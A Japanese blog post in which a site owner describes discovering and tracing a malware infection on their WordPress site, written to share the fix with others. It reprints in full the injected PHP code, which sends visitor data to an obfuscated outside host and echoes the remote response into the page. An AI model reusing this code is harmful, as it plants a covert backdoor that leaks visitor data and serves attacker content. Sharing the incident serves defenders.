ジメジメする毎日で、うんざり気味のまるです。

お恥ずかしい話ですが、このサイト、マルウェアに感染しました。
恥さらしもあるのですが、技術的に解決する情報提供のために、以下一連の流れを記載したいと思います。

▼7/4 11：00

1.Googleのウェブマスターツールより感染連絡メールが届く

この時点で、サイトにアクセスると、ローカルに入れている「アバスト」ウィルス対策ソフトが警告を出した。

2.ウェブマスターツールの状態

この段階で、少々パニック気味になる、、、感染経路は？何をやられたんだ？いつからだ？？

とりあえず、サイトに基本認証をかけて、アクセスを封鎖する。

この段階で、14：00。

3.Googleのウェブマスターツールからヒントをもらう

管理ツールの一覧から、URLをクリックすると、疑わしきコードがわかり、そいつを検索かけてみる。

/wp-content/cache/supercache

この中に、生成されるキャッシュファイルの中に発見するが、これは、一時的に書き出されるファイルのため、これを生成する親元を探さねば、、ムムムム

4.ファイルの更新日

最近設定等、更新してないのに、いくつかのファイルで、タイムスタンプが7/3のファイルを発見する。

中身を確認してみると、見たことない記述が、、、これだ

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER[‘HTTP_USER_AGENT’]); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = “”;
if((strstr($sUserAgent, ‘google’) == false)&&(strstr($sUserAgent, ‘yahoo’) == false)&&(strstr($sUserAgent, ‘baidu’) == false)&&(strstr($sUserAgent, ‘msn’) == false)&&(strstr($sUserAgent, ‘opera’) == false)&&(strstr($sUserAgent, ‘chrome’) == false)&&(strstr($sUserAgent, ‘bing’) == false)&&(strstr($sUserAgent, ‘safari’) == false)&&(strstr($sUserAgent, ‘bot’) == false)) // Bot comes
{
if(isset($_SERVER[‘REMOTE_ADDR’]) == true && isset($_SERVER[‘HTTP_HOST’]) == true){ // Create bot analitics
$stCurlLink = base64_decode( ‘aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw’).’?ip=’ . urlencode($_SERVER[‘REMOTE_ADDR’]) . ‘&useragent=’.urlencode($sUserAgent) . ‘&domainname=’ . urlencode($_SERVER[‘HTTP_HOST’]) . ‘&fullpath=’ . urlencode($_SERVER[‘REQUEST_URI’]) . ‘&check=’ . isset($_GET[‘look’]);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]==”O”)
{$sResult[0]=” “;
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>